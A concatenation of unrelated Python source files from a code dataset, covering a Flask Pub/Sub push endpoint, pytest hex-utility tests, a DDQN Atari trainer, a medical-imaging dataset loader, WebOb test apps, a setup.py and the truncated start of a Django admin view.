import base64
import json
import logging
import warnings
from flask import Blueprint, Response, abort, request
from flask.signals import Namespace
from six.moves.http_client import BAD_REQUEST, OK
# Module-wide logger and the blinker signal fired for every received push.
logger = logging.getLogger('Flask-PubSub')
pubsub_message = Namespace().signal('pubsub.message')
class PubSub(object):
    """
    Flask-PubSub
    Documentation:
    https://flask-pubsub.readthedocs.io
    Google Cloud Pub/Sub Documentation:
    https://cloud.google.com/pubsub/docs
    :param app: Flask app to initialize with. Defaults to `None`
    """
    client = None              # publisher client, set in init_app
    redis = None               # optional redis handle (stored, not used here)
    verification_token = None  # shared secret checked on every push request
    codec = None               # serializer exposing dumps/loads (default: json)
    def __init__(self, app=None, blueprint=None, client=None, redis=None, codec=None):
        # Supports both direct and app-factory initialisation patterns.
        if app is not None:
            self.init_app(app, blueprint, client, redis, codec)
    def init_app(self, app, blueprint=None, client=None, redis=None, codec=None):
        # Wire the POST /pubsub push endpoint onto the given (or a fresh) blueprint.
        # NOTE(review): the blueprint is configured but never registered on
        # ``app`` here -- presumably the caller registers it; confirm.
        blueprint = blueprint or Blueprint('pubsub', __name__)
        blueprint.add_url_rule('/pubsub', 'pubsub', self.handle_push, methods=('POST',))
        self.client = client
        self.redis = redis
        self.verification_token = token = app.config.get('PUBSUB_VERIFICATION_TOKEN')
        if token is None:
            warnings.warn('PUBSUB_VERIFICATION_TOKEN not set', RuntimeWarning, stacklevel=2)
        self.codec = codec or json
    def publish(self, topic, message, **kwargs):
        # Serialize with the configured codec and hand off to the client.
        self.client.publish(topic, self.codec.dumps(message), **kwargs)
    def handle_push(self):
        """Endpoint for Pub/Sub push deliveries: verify token, decode, signal."""
        # NOTE(review): plain != comparison of the shared token; consider a
        # constant-time compare (hmac.compare_digest) -- confirm threat model.
        if request.args.get('token') != self.verification_token:
            abort(BAD_REQUEST)
        payload = json.loads(request.data.decode('utf-8'))
        logger.debug('payload=%s', payload)
        # Pub/Sub wraps the message body base64-encoded under message.data.
        message = self.codec.loads(base64.b64decode(payload['message']['data']))
        logger.debug('message=%s', message)
        pubsub_message.send(self, message=message)
        return Response(status=OK)
# EOF
| StarcoderdataPython |
5131127 | # !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests related to crypto utils module"""
import pytest
import pyswitcheo.crypto_utils as cutils
@pytest.mark.parametrize("input_hex, want", [
    ('0101', True),
    ('', True),
    ('0x01', False),
])
def test_is_regex(input_hex, want):
    """Check that is_hex accepts bare hex strings and rejects 0x-prefixed ones."""
    got = cutils.is_hex(input_hex)
    assert want == got, "Expected {0} but received {1} for input {2}".format(want, got, input_hex)
@pytest.mark.parametrize("input_hex, raises_exception", [
    (b'0x11', True),
])
def test_ensure_hex(input_hex, raises_exception):
    """Check that ensure_hex raises for non-hexstring (bytes) input."""
    with pytest.raises(Exception) as excinfo:
        cutils.ensure_hex(input_hex)
    # Consistency fix: match on the exception *message* via ``excinfo.value``
    # as the other tests in this module do; ``str(excinfo)`` also includes
    # location metadata and is deprecated for message matching.
    assert 'Expected a hexstring' in str(excinfo.value)
@pytest.mark.parametrize("input_hex, want", [
    ('0101', '0101'),
    ('010111', '110101'),
    ('abcdef', 'efcdab'),
])
def test_reverse_hex(input_hex, want):
    """Check byte-wise (two hex chars at a time) reversal of a hex string."""
    got = cutils.reverse_hex(input_hex)
    assert want == got, "Expected {0} but received {1} for input {2}".format(want, got, input_hex)
def test_num_to_hex_string():
    """Check num_to_hex_string conversion and its input validation errors."""
    # (input, expected hex) pairs; note 1000 -> "e8" (low byte only,
    # presumably because the default size is one byte -- TODO confirm).
    data = [(30, "1e"), (100, "64"), (2, "02"), (1000, "e8")]
    for inp, want in data:
        got = cutils.num_to_hex_string(inp)
        assert want == got, "Expected {0} but received {1} for input {2}".format(want, got, inp)
    # Negative numbers must be rejected.
    num = -1
    with pytest.raises(Exception) as excinfo:
        cutils.num_to_hex_string(num=num, size=1, little_endian=False)
    assert 'num should be unsigned' in str(excinfo.value)
    # Fractional sizes must be rejected.
    size = 0.5
    with pytest.raises(Exception) as excinfo:
        cutils.num_to_hex_string(num=1, size=size, little_endian=False)
    assert 'size must be a whole integer' in str(excinfo.value)
@pytest.mark.parametrize("input_hex, want", [
    (30, '1e'),
    (100, '64'),
    (2, '02'),
    (12, '0c'),
    (1000, 'fde803'),
    (0xff, 'fdff00'),
    (100000, 'fea08601'),
    (4000000, 'fe00093d'),
])
def test_num_to_var_int(input_hex, want):
    """Check variable-length integer encoding (fd/fe prefixes for wider values)."""
    got = cutils.num_to_var_int(input_hex)
    assert want == got, "Expected {0} but received {1} for input {2}".format(want, got, input_hex)
| StarcoderdataPython |
3456834 | import big_csp
# Iterative optimisation over a constraint-satisfaction problem: each pass
# rebuilds the model, demands a strictly better objective than the last
# solution, and stops when the solver reports unsatisfiable -- the last
# printed assignment is therefore optimal.
optimal = 0
while True:
    encoder = big_csp.Encoder(bits=32)
    # Decision variables x0..x27, one solver Entity each.
    x0 = big_csp.Entity(encoder)
    x1 = big_csp.Entity(encoder)
    x2 = big_csp.Entity(encoder)
    x3 = big_csp.Entity(encoder)
    x4 = big_csp.Entity(encoder)
    x5 = big_csp.Entity(encoder)
    x6 = big_csp.Entity(encoder)
    x7 = big_csp.Entity(encoder)
    x8 = big_csp.Entity(encoder)
    x9 = big_csp.Entity(encoder)
    x10 = big_csp.Entity(encoder)
    x11 = big_csp.Entity(encoder)
    x12 = big_csp.Entity(encoder)
    x13 = big_csp.Entity(encoder)
    x14 = big_csp.Entity(encoder)
    x15 = big_csp.Entity(encoder)
    x16 = big_csp.Entity(encoder)
    x17 = big_csp.Entity(encoder)
    x18 = big_csp.Entity(encoder)
    x19 = big_csp.Entity(encoder)
    x20 = big_csp.Entity(encoder)
    x21 = big_csp.Entity(encoder)
    x22 = big_csp.Entity(encoder)
    x23 = big_csp.Entity(encoder)
    x24 = big_csp.Entity(encoder)
    x25 = big_csp.Entity(encoder)
    x26 = big_csp.Entity(encoder)
    x27 = big_csp.Entity(encoder)
    # Per-variable domain bounds.  NOTE(review): chained comparisons like
    # ``2 <= x0 <= 7`` rely on big_csp overloading both comparison and
    # truth-testing of Entity objects -- presumably intended; confirm.
    big_csp.Constraint(2 <= x0 <= 7)
    big_csp.Constraint(1 <= x1 <= 16)
    big_csp.Constraint(1 <= x2 <= 62)
    big_csp.Constraint(1 <= x3 <= 50)
    big_csp.Constraint(2 <= x4 <= 62)
    big_csp.Constraint(2 <= x5 <= 84)
    big_csp.Constraint(2 <= x6 <= 55)
    big_csp.Constraint(2 <= x7 <= 74)
    big_csp.Constraint(0 <= x8 <= 90)
    big_csp.Constraint(0 <= x9 <= 15)
    big_csp.Constraint(0 <= x10 <= 45)
    big_csp.Constraint(1 <= x11 <= 6)
    big_csp.Constraint(2 <= x12 <= 30)
    big_csp.Constraint(1 <= x13 <= 11)
    big_csp.Constraint(0 <= x14 <= 51)
    big_csp.Constraint(2 <= x15 <= 72)
    big_csp.Constraint(0 <= x16 <= 63)
    big_csp.Constraint(1 <= x17 <= 72)
    big_csp.Constraint(1 <= x18 <= 83)
    big_csp.Constraint(0 <= x19 <= 86)
    big_csp.Constraint(1 <= x20 <= 30)
    big_csp.Constraint(2 <= x21 <= 85)
    big_csp.Constraint(2 <= x22 <= 90)
    big_csp.Constraint(0 <= x23 <= 70)
    big_csp.Constraint(1 <= x24 <= 35)
    big_csp.Constraint(1 <= x25 <= 21)
    big_csp.Constraint(1 <= x26 <= 36)
    big_csp.Constraint(1 <= x27 <= 4)
    # Objective bound: require strict improvement over the previous solution.
    big_csp.Constraint(optimal < x20 + x4 * 6 * x4 + x22 * x11 + 6 * x1 + x17 + x25 * 2 * x0 + x0 + x25 * 2 * x13 + x14 * x19 + x5 ** 3 + x16 + x16 * x19 ** 6 + x5 * x19 + 4 * x1 + x6 * x5 + 4 * x24 + x7 * x9 + x27 ** 3 + x22 + x23 * 2 * x18 + x20 + x24 * 2 * x5 + x3 * x13 + x2 ** 6 + x8 + x4 * 5 * x21 + x9 + x12 * 3 * x1)
    # Problem (side) constraints.
    big_csp.Constraint(x8 * x26 + 3 * x12 + x5 * x8 + x16 ** 5 + x20 + x10 * 3 * x5 + x11 * x7 + 2 * x15 + x22 * x25 + 7 * x23 + x12 * x22 + 7 * x20 + x6 + x13 * x23 ** 7 <= 722)
    big_csp.Constraint(x13 * x0 + x24 ** 5 + x1 * x27 + x8 ** 2 + x17 * x7 + 4 * x7 + x18 + x2 * x2 ** 5 + x18 + x8 * x25 ** 2 + x20 + x14 * 4 * x2 + x9 + x24 * x2 ** 7 <= 392)
    big_csp.Constraint(x10 * x15 + x22 ** 2 + x0 * x3 + 3 * x22 + x13 + x19 * x19 ** 2 + x10 + x7 * x7 ** 6 + x1 * x16 + 7 * x10 + x14 * x8 + x27 ** 7 + x1 * x4 + 3 * x9 <= 655)
    big_csp.Constraint(x12 + x24 * 2 * x2 + x9 + x19 * x11 ** 7 + x16 + x17 * 2 * x10 + x6 + x19 * 3 * x3 + x16 + x1 * x17 ** 5 + x2 + x25 * 3 * x24 + x10 * x26 + 7 * x11 <= 630)
    big_csp.Constraint(x5 * x27 + x16 ** 6 + x15 + x25 * x2 ** 6 + x20 + x0 * x10 ** 3 + x14 + x14 * 3 * x3 + x22 + x21 * 3 * x10 + x17 + x14 * x1 ** 4 + x11 * x24 + x1 ** 6 <= 245)
    big_csp.Constraint(x1 + x13 * x26 ** 5 + x18 + x27 * 4 * x7 + x1 * x7 + x14 ** 5 + x3 * x13 + 6 * x15 + x1 * x27 + 5 * x6 + x3 * x2 + x24 ** 2 + x17 + x9 * x18 ** 6 <= 764)
    big_csp.Constraint(x18 * x27 + 7 * x2 + x9 + x9 * 7 * x10 + x15 + x17 * 7 * x17 + x17 * x9 + x23 ** 7 + x17 + x24 * x10 ** 4 + x11 * x16 + 5 * x2 + x7 + x27 * 6 * x19 <= 581)
    solver = big_csp.Solver()
    if solver.satisfy([x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15, x16, x17, x18, x19, x20, x21, x22, x23, x24, x25, x26, x27]):
        # Satisfiable: record the (concrete) objective value and print the model.
        optimal = x20 + x4 * 6 * x4 + x22 * x11 + 6 * x1 + x17 + x25 * 2 * x0 + x0 + x25 * 2 * x13 + x14 * x19 + x5 ** 3 + x16 + x16 * x19 ** 6 + x5 * x19 + 4 * x1 + x6 * x5 + 4 * x24 + x7 * x9 + x27 ** 3 + x22 + x23 * 2 * x18 + x20 + x24 * 2 * x5 + x3 * x13 + x2 ** 6 + x8 + x4 * 5 * x21 + x9 + x12 * 3 * x1
        print(optimal, '=>', x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15, x16, x17, x18, x19, x20, x21, x22, x23, x24, x25, x26, x27)
    else:
        # No assignment beats the previous objective: we are at the optimum.
        break
    solver.clear()
| StarcoderdataPython |
4871726 | from .supervised import (plot, plot_classification_categorical,
plot_regression_categorical,
plot_classification_continuous,
plot_regression_continuous,
class_hists)
from .utils import (find_pretty_grid, mosaic_plot, discrete_scatter,
plot_coefficients)
# Explicit public API of the plotting package (kept alphabetical).
__all__ = [
    'class_hists', 'discrete_scatter',
    'find_pretty_grid', 'mosaic_plot', 'plot',
    'plot_classification_categorical', 'plot_classification_continuous',
    'plot_regression_categorical', 'plot_regression_continuous',
    'plot_coefficients']
| StarcoderdataPython |
12808923 | import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import argparse
import torch
import numpy as np
from algos.ddqn import DDQN_Agent
from common.buffers import ReplayBuffer
from common.networks import ConvAtariQsNet
from utils import train_tools
from utils.atari_wrappers import make_atari_env
if __name__ == '__main__':
    # ----- command-line configuration -----
    parser = argparse.ArgumentParser(description='DDQN algorithm in atari environment')
    parser.add_argument('--env', type=str, default='PongNoFrameskip-v4',
                        help='the name of environment')
    parser.add_argument('--capacity', type=int, default=100000,
                        help='the max size of data buffer')
    parser.add_argument('--batch_size', type=int, default=32,
                        help='the size of batch that sampled from buffer')
    parser.add_argument('--explore_step', type=int, default=20000,
                        help='the steps of exploration before train')
    parser.add_argument('--eval_freq', type=int, default=10000,
                        help='how often (time steps) we evaluate during training, and it will not eval if eval_freq < 0')
    parser.add_argument('--max_train_step', type=int, default=2000000,
                        help='the max train step')
    parser.add_argument('--log_interval', type=int, default=1000,
                        help='The number of steps taken to record the model and the tensorboard')
    parser.add_argument('--resume', action='store_true', default=False,
                        help='whether load the last saved model to train')
    parser.add_argument('--train_id', type=str, default='ddqn_atari_test',
                        help='Path to save model and log tensorboard')
    parser.add_argument('--device', type=str, default='cpu',
                        help='Choose cpu or cuda')
    parser.add_argument('--show', action='store_true', default=False,
                        help='show the trained model visually')
    parser.add_argument('--seed', type=int, default=10,
                        help='the random seed')
    parser.add_argument('--scale_obs', action='store_true', default=False,
                        help='whether scale the obs to 0-1')
    args = parser.parse_args()
    # ----- reproducibility: seed torch, numpy and the environment -----
    torch.manual_seed(args.seed)
    np.random.seed(args.seed)
    env = make_atari_env(args.env, scale_obs=args.scale_obs)
    env.seed(args.seed)
    obs_dim = env.observation_space.shape
    act_dim = env.action_space.n
    # Convolutional Q-network over 4 stacked frames.
    Q_net = ConvAtariQsNet(num_frames_stack=4, act_dim=act_dim)
    # create buffer
    # (no replay buffer is needed when only visualising a trained model)
    if args.show:
        replay_buffer = None
    else:
        replay_buffer = ReplayBuffer(obs_dim=obs_dim, act_dim=1,
                                     capacity=args.capacity, batch_size=args.batch_size)
    # ----- agent with standard DDQN hyper-parameters -----
    agent = DDQN_Agent(env=env,
                       replay_buffer=replay_buffer,
                       Q_net=Q_net,
                       qf_lr=1e-4,
                       gamma=0.99,
                       initial_eps=0.1,
                       end_eps=0.001,
                       eps_decay_period=1000000,
                       eval_eps=0.001,
                       target_update_freq=1000,
                       train_interval=1,
                       explore_step=args.explore_step,
                       eval_freq=args.eval_freq,
                       max_train_step=args.max_train_step,
                       train_id=args.train_id,
                       log_interval=args.log_interval,
                       resume=args.resume,
                       device=args.device
                       )
    # Either visualise an existing model or start/resume training.
    if args.show:
        train_tools.evaluate(agent, 10, show=True)
    else:
        agent.learn()
| StarcoderdataPython |
6532171 | #!/usr/bin/python
import os, sys
import prettyformat
import fileinput
# Filter build output read from stdin and re-emit it through
# prettyformat.pretty().  argv[1] is the default action tag, argv[2] the
# module name shown in every line.  Assumes make-style messages on stdin
# ("Compiling ...", "Linking ...", "rm ...", etc.) -- TODO confirm producer.
action = sys.argv[1]
module = sys.argv[2]
line = sys.stdin.readline()
while(line):
    valid = True
    # Classify the line by its leading verb to pick the action tag.
    if("Compiling " in line):
        action = "CC"
    elif("Linking " in line):
        action = "LN"
    elif("checking " in line):
        action = "CHECK"
    elif("Building " in line):
        action = "BUILD"
    elif("Using FLAGS" in line):
        # Suppress FLAGS lines entirely.
        valid = False
    elif(line.startswith("rm")):
        # An "rm" command may span several backslash-continued lines;
        # emit one RM entry per removed file, skipping option flags.
        line = line.split("rm")[1]
        while(line.strip().endswith("\\")):
            rm_splits = line.strip().split(" ")
            if(len(rm_splits) == 0):
                break
            if(rm_splits[0].startswith("-")):
                rm_splits = rm_splits[1:]
            for item in rm_splits:
                if(item.strip() != "" and item.strip() != "\\"):
                    prettyformat.pretty("RM", module, item.strip(), False)
            line = sys.stdin.readline()
        # Final (non-continued) line of the rm command.
        rm_splits = line.strip().split(" ")
        if(len(rm_splits) != 0):
            if(rm_splits[0].startswith("-")):
                rm_splits = rm_splits[1:]
            for item in rm_splits:
                if(item.strip() != "" and item.strip() != "\\"):
                    prettyformat.pretty("RM", module, item.strip(), False)
        valid = False
    else:
        # Anything unrecognised is treated as configure output.
        action = "CONF"
    if(valid == True):
        # Strip the verb prefix before printing, depending on the action.
        newline = line.split("\n")[0]
        if(action == "CC"):
            newline = newline.split("Compiling ")[1]
        elif(action == "LN"):
            newline = newline.split("Linking ")[1]
        elif(action == "BUILD"):
            newline = newline.split("Building ")[1]
        elif(action == "CONF"):
            newline = newline.strip()
        prettyformat.pretty(action, module, newline.strip(), False)
    line = sys.stdin.readline()
| StarcoderdataPython |
9761064 |
""" Basic engine class, inherited in guishared.py and implemented by each GUI toolkit code """
import recorder, replayer
import os, sys, imp
# Resolve the builtins module portably across Python major versions.
try:
    # In Py 2.x, the builtins were in __builtin__
    BUILTINS = sys.modules['__builtin__']
except KeyError: # pragma: no cover - not worried about Python 3 yet...
    # In Py 3.x, they're in builtins
    BUILTINS = sys.modules['builtins']
# Behaves as a singleton...
class ScriptEngine:
    """Base engine coordinating a use-case recorder and replayer.

    GUI-toolkit-specific engines inherit from this class.  Note: this module
    targets Python 2 (see the ``exec ... in ...`` statement in
    ``run_python_file``).
    """
    # Read USECASE_HOME also, the legacy name from PyUseCase
    storytextHome = os.path.abspath(os.getenv("STORYTEXT_HOME",
                                              os.getenv("USECASE_HOME",
                                                        os.path.expanduser("~/.storytext"))))
    def __init__(self, enableShortcuts=False, **kwargs):
        # Export the resolved home so helpers/child code agree on where
        # shortcut files live.
        os.environ["STORYTEXT_HOME"] = self.storytextHome
        self.enableShortcuts = enableShortcuts
        self.recorder = recorder.UseCaseRecorder(self.getShortcuts())
        self.replayer = self.createReplayer(**kwargs)
        self.registerShortcuts()
        self.replayer.tryRunScript()
    def recorderActive(self):
        # Enabling shortcuts forces the recorder path even with no recording.
        return self.enableShortcuts or self.recorder.isActive()
    def replayerActive(self):
        return self.enableShortcuts or self.replayer.isActive()
    def active(self):
        # True if either side of the engine is doing anything.
        return self.replayerActive() or self.recorderActive()
    def registerShortcuts(self):
        # Make every stored shortcut known to the replayer (when active).
        for shortcut in self.getShortcuts():
            if self.replayerActive():
                self.replayer.registerShortcut(shortcut)
    @classmethod
    def getShortcuts(cls, storyTextHome=None):
        """Return a ReplayScript for each *.shortcut file under the home dir."""
        home = storyTextHome if storyTextHome else cls.storytextHome
        shortcuts = []
        if not os.path.isdir(home):
            return shortcuts
        for fileName in sorted(os.listdir(home)):
            if fileName.endswith(".shortcut"):
                fullPath = os.path.join(home, fileName)
                shortcuts.append(replayer.ReplayScript(fullPath, ignoreComments=True))
        return shortcuts
    def createReplayer(self, **kw):
        # Hook: toolkit-specific subclasses may return a specialised replayer.
        return replayer.UseCaseReplayer(self.recorder, **kw)
    def applicationEvent(self, name, category=None, supercedeCategories=[], timeDelay=0.001, delayLevel=0):
        # Small time delay to avoid race conditions: see replayer
        # NOTE(review): mutable default for supercedeCategories -- harmless
        # only if callees never mutate it; confirm.
        if self.recorderActive():
            self.recorder.registerApplicationEvent(name, category, supercedeCategories, delayLevel)
        if self.replayerActive():
            self.replayer.registerApplicationEvent(name, timeDelay)
    def applicationEventRename(self, oldName, newName, oldCategory=None, newCategory=None):
        # May need to recategorise in the recorder
        if self.recorderActive() and oldCategory != newCategory:
            self.recorder.applicationEventRename(oldName, newName, oldCategory, newCategory)
        if self.replayerActive():
            self.replayer.applicationEventRename(oldName, newName)
    def applicationEventDelay(self, name, **kw):
        if self.recorderActive():
            self.recorder.applicationEventDelay(name, **kw)
    def applicationEventRemove(self, *args, **kw):
        if self.recorderActive():
            self.recorder.unregisterApplicationEvent(*args, **kw)
    def run(self, options, args):
        """Run the system under test; returns False when no program was given."""
        if len(args) == 0:
            return False
        else:
            self.handleAdditionalOptions(options)
            self.runSystemUnderTest(args)
            return True
    def handleAdditionalOptions(self, options):
        # Hook for subclasses; the base engine has no extra options.
        pass
    def runSystemUnderTest(self, args):
        # By default, just assume it's a python program. Allow this to be overridden
        self.run_python_file(args)
    def run_python_file(self, args):
        """Run a python file as if it were the main program on the command line.
        `args` is the argument array to present as sys.argv, including the first
        element representing the file being executed.
        Lifted straight from coverage.py by <NAME>
        """
        filename = args[0]
        # Create a module to serve as __main__
        old_main_mod = sys.modules['__main__']
        main_mod = imp.new_module('__main__')
        sys.modules['__main__'] = main_mod
        main_mod.__file__ = filename
        main_mod.__builtins__ = BUILTINS
        # Set sys.argv and the first path element properly.
        old_argv = sys.argv
        old_path0 = sys.path[0]
        sys.argv = args
        sys.path[0] = os.path.dirname(filename)
        try:
            source = open(filename, 'rU').read()
            # Python 2 exec statement ('rU' mode is likewise Python-2 era).
            exec compile(source, filename, "exec") in main_mod.__dict__
        finally:
            # Restore the old __main__
            sys.modules['__main__'] = old_main_mod
            # Restore the old argv and path
            sys.argv = old_argv
            sys.path[0] = old_path0
5033140 | import sys
import os
import json
from os.path import dirname
from pathlib import Path
import nibabel as nib
from nibabel.processing import resample_to_output
import numpy as np
import torch
from torchvision import transforms
from torch.utils.data import Dataset, DataLoader
from PIL import Image
# Compact numeric printing for the debug output in this module.
np.set_printoptions(precision = 3, suppress = True)
import scipy.ndimage as ndimage
class CaseLoader:
    """Resolve case directories and load imaging/segmentation NIfTI volumes
    for LiTS-style datasets.

    Each case lives in ``<case_folder>/case_XXXXX/`` and contains one imaging
    and one segmentation NIfTI file.
    """
    def __init__(self, case_folder, imaging_file='imaging.nii', segmentation_file='segmentation.nii'):
        """Remember the dataset root and the per-case NIfTI file names."""
        self.case_folder = case_folder
        self.imaging_file = imaging_file
        self.segmentation_file = segmentation_file

    def __str__(self):
        return 'case_folder: {0}'.format(self.case_folder)

    def get_full_case_id(self, cid):
        """Normalise a case id: integers become ``case_XXXXX`` (zero-padded),
        non-numeric strings are passed through unchanged."""
        try:
            cid = int(cid)
            case_id = "case_{:05d}".format(cid)
        except ValueError:
            case_id = cid
        return case_id

    def get_case_path(self, cid):
        """Return the directory of case ``cid``.

        Raises IOError when the dataset root is missing and ValueError when
        the case directory does not exist.
        """
        # Resolve location where data should be living.
        # Bug fix: the error message previously referenced an undefined name
        # ``data_path``, turning this branch into a NameError instead of the
        # intended IOError.
        if not os.path.isdir(self.case_folder):
            raise IOError(
                "Data path, {}, could not be resolved".format(self.case_folder)
            )
        # Get case_id from provided cid
        case_id = self.get_full_case_id(cid)
        # Make sure that case_id exists under the data_path
        case_path = os.path.join(self.case_folder, case_id)
        if not os.path.isdir(case_path):
            raise ValueError(
                "Case could not be found \"{}\"".format(case_path)
            )
        return case_path

    def load_volume(self, cid):
        """Load the imaging NIfTI volume for case ``cid``."""
        case_path = self.get_case_path(cid)
        vol = nib.load(os.path.join(case_path, self.imaging_file))
        return vol

    def load_segmentation(self, cid):
        """Load the segmentation NIfTI volume for case ``cid``."""
        case_path = self.get_case_path(cid)
        seg = nib.load(os.path.join(case_path, self.segmentation_file))
        return seg

    def load_case(self, cid):
        """Load the (volume, segmentation) pair for case ``cid``."""
        vol = self.load_volume(cid)
        seg = self.load_segmentation(cid)
        return vol, seg
class LiTSDataSet(Dataset):
    """Torch dataset yielding (volume, segmentation) pairs for LiTS cases."""
    def __init__(self, dataset_path, dataset_file, cases=None, transforms=None, zoom=1, dilation=False):
        # ``cases`` (if given) overrides the case list; otherwise the list is
        # read from the dataset JSON index file.
        self.case_loader = CaseLoader(dataset_path)
        self.cases = []
        if cases is not None:
            self.cases = cases
        else:
            with open(dataset_file) as json_file:
                data_file = json.load(json_file)
                for dat in data_file:
                    case_id = dat['case_id']
                    self.cases.append(case_id)
        self.transforms = transforms  # applied to both volume and mask
        self.zoom = zoom              # in-plane zoom factor; slice axis untouched
        self.dilation = dilation      # grow the mask (see __getitem__)
    def __len__(self):
        return len(self.cases)
    def __getitem__(self, idx):
        case_id = self.cases[idx]
        vol, seg = self.case_loader.load_case(case_id)
        volume = vol.get_fdata().astype(np.float32)
        segmentation = seg.get_fdata().astype(np.float32)
        # Nearest-neighbour zoom in-plane only (order=0 keeps labels discrete).
        volume = ndimage.zoom(volume, zoom=[self.zoom, self.zoom, 1], order=0)
        segmentation = ndimage.zoom(segmentation, zoom=[self.zoom, self.zoom, 1], order=0)
        if self.dilation:
            # Six rounds of binary dilation in total (one here + five in the
            # loop), then restore the original label-2 voxels on top of the
            # grown binary mask.
            segmentation2 = ndimage.binary_dilation(segmentation).astype(np.uint8)
            for i in range(5):
                segmentation2 = ndimage.binary_dilation(segmentation2).astype(np.uint8)
            segmentation2[segmentation == 2.0] = 2
            segmentation = segmentation2.astype(np.float32)
        # rot90 returns a view; copy so downstream tensors own their memory.
        volume = np.rot90(volume).copy()
        segmentation = np.rot90(segmentation).copy()
        if self.transforms is not None:
            volume = self.transforms(volume)
            segmentation = self.transforms(segmentation)
        # volume = volume.type(torch.FloatTensor)
        # segmentation = segmentation.type(torch.ByteTensor)
        return volume, segmentation
def get_lits_data_loaders(dataset_path, dataset_file, transforms, split_ratio, batch_size, zoom, dilation):
    """Build train/val DataLoaders from the fixed case-list files.

    The split is taken from ``train_cases.txt`` / ``test_cases.txt`` in the
    working directory; ``split_ratio`` is unused (the random-split code it
    belonged to was removed) but kept for backward compatibility with
    existing callers.

    Returns a dict with 'train'/'val' DataLoaders and 'n_train'/'n_val' sizes.
    """
    # ``dtype=np.str`` was removed in NumPy 1.24; the builtin ``str`` is the
    # documented replacement and behaves identically here.
    train_cases = np.loadtxt('train_cases.txt', delimiter=",", dtype=str)
    test_cases = np.loadtxt('test_cases.txt', delimiter=",", dtype=str)
    train_dataset = LiTSDataSet(dataset_path, dataset_file, train_cases,
                                transforms=transforms, zoom=zoom, dilation=dilation)
    test_dataset = LiTSDataSet(dataset_path, dataset_file, test_cases,
                               transforms=transforms, zoom=zoom, dilation=dilation)
    dataloaders = {
        'train': DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=1),
        'val': DataLoader(test_dataset, batch_size=batch_size, shuffle=True, num_workers=1),
        'n_train': len(train_dataset),
        'n_val': len(test_dataset)
    }
    return dataloaders
if __name__ == "__main__":
    # Smoke test: load one case directly, then one sample through the
    # dataset, printing shapes, dtypes and value ranges.
    dataset_path = '/home/ubelix/artorg/paolucci/datasets/lits/cases'
    case_loader = CaseLoader(dataset_path)
    print(case_loader)
    vol, seg = case_loader.load_case('case_00003')
    # print(vol)
    print(seg.shape)
    # vol_resampled = resample_to_output(vol, [1, 1, 1], order=0)
    # print(vol_resampled.shape)
    dataset_file = os.path.join(dataset_path, 'lits.json')
    data_set = LiTSDataSet(dataset_path, dataset_file,
                           transforms=transforms.Compose([transforms.ToTensor()]))
    print(data_set)
    vol, seg = data_set[2]
    print(vol.shape, vol.dtype)
    print(seg.shape, seg.dtype)
    print(vol.min(), vol.max())
    print(seg.min(), seg.max())
| StarcoderdataPython |
6696944 | # -*- coding: utf-8 -*-
from webob import Request
from webob import Response
from webob import exc
def input_app(environ, start_response):
    """Tiny WSGI app returning HTML snippets keyed on the request path.

    Routes:
        /         -> a text <input> element
        /submit   -> a submit button
        /html/*   -> a minimal success page
        otherwise -> an empty body
    """
    resp = Response()
    req = Request(environ)
    if req.path_info == '/':
        resp.body = b'<input name="youyou" type="text" value="" />'
    elif req.path_info == '/submit':
        resp.body = b'<input type="submit" value="OK" />'
    elif req.path_info.startswith('/html'):
        resp.body = b'<html><p>Success</p></html>'
    else:
        # FIX: WebOb's Response.body only accepts bytes; assigning the str ''
        # raised TypeError on every unmatched path.
        resp.body = b''
    return resp(environ, start_response)
def application(environ, start_response):
    """WSGI app: a <pre> greeting for GET, a link for any other method."""
    request = Request(environ)
    resp = Response()
    resp.body = (b'<pre>Yeah !</pre>'
                 if request.method == 'GET'
                 else b'<a href="/plop">Yeah !</a>')
    return resp(environ, start_response)
def secure_application(environ, start_response):
    """Gate ``application`` behind REMOTE_USER; respond 401 otherwise."""
    if 'REMOTE_USER' in environ:
        return application(environ, start_response)
    return exc.HTTPUnauthorized('vomis')(environ, start_response)
| StarcoderdataPython |
3561363 | from setuptools import find_packages
from setuptools import setup
# Use the README as the long description shown on PyPI.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()
# Package metadata for py-modular, an experimental modular audio environment.
setup(
    name='py-modular',
    version='0.0.1',
    description='An experimental, modular audio programming environment in python',
    long_description=long_description,
    long_description_content_type="text/markdown",
    url='https://github.com/fredyeah/py-modular',
    author='Frederic',
    author_email='<EMAIL>',  # NOTE(review): anonymised placeholder — fill in before release
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    packages=find_packages(),
    # Runtime dependencies: sounddevice/SoundFile for audio I/O, matplotlib
    # (plus its transitive pins: cycler, kiwisolver, Pillow, pyparsing,
    # python-dateutil, six) for plotting, cffi/pycparser for native bindings.
    install_requires=[
        'cffi',
        'cycler',
        'kiwisolver',
        'matplotlib',
        'numpy',
        'Pillow',
        'pycparser',
        'pyparsing',
        'python-dateutil',
        'six',
        'sounddevice',
        'SoundFile'
    ]
)
| StarcoderdataPython |
3278436 | <gh_stars>0
import json
import os
import zipfile
from django.contrib.auth.hashers import check_password, make_password
from django.http import HttpResponse, FileResponse, StreamingHttpResponse
from django.shortcuts import render
# Create your views here.
from RootAPP.models import PathItem, FileItem
from UserAPP.models import User
#####################################################################################################################################
# Token stored in the session to prove root access (value anonymised in this
# copy). NOTE(review): a hard-coded credential in source is a security risk —
# move it to settings or an environment variable.
pwd="<PASSWORD>="
# Project base directory: two levels above this file.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
rooturl=os.path.join(BASE_DIR, 'RootAPP/static/Root/')  # root static area
prturl=os.path.join(BASE_DIR, 'RootAPP/static/Root/Prt/')  # saved screenshots
tempurl=os.path.join(BASE_DIR, 'RootAPP/static/Root/Temp/')  # temporary zip downloads
def Code(request):
    """Root-only helper: hash a plaintext password and verify it against a hash.

    Query params: ``a`` = plaintext password, ``b`` = stored hash.
    Returns JSON ``{"code", "pwd", "flag"}`` for root users; every failure
    path (anonymous, non-root, or any exception) responds 404.
    """
    try:
        id = request.session.get("id")
        if id != None:
            per = User.objects.get(id=id)
            if per.isroot == '1':
